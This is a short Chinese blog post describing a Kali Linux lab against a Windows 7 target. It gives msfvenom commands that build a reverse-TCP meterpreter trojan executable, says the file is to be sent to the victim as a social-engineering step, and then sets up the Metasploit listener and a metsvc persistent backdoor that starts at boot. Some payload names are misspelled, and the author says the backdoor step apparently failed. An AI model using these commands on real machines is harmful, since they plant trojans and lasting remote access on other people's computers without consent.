kali后门php,kali获取持续性后门shell · 醉梦半醒’s Blog

kali.jpg

win7靶机:192.168.1.38

kali:192.168.1.35

上一篇讲到通过ms17_010获取了shell,如果对方没有这个漏洞可以利用呢?换一种社会工程学的思路:

msfvenom -p windows/meterpreter/resverse_tcp lhost=192.168.1.35 lport=4444 -f exe -o /hack.exe 生成木马

msfvenom_exemake.png

将exe文件发送给靶机

use exploit/multi/handle

set payload windows/meterpreter/resverse_tcp

set lhost 192.168.1.35

exploit

ms17_010_exploit.png

当靶机打开木马文件时会建立一个session

后面获得hash和3389远程的就不多说了,和上一篇一样

生成持续性后门:

run metsvc -A 持续性后门,会使靶机开机启动木马

再启动一个msf

use exploit/multi/handler

set payload windows/metsvc_bind_tcp

show options

set LPORT 31337

set RHOST 192.168.1.38靶机地址

exploit

ms17_010_backdoor.png

好像没用,先更新到这里吧

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值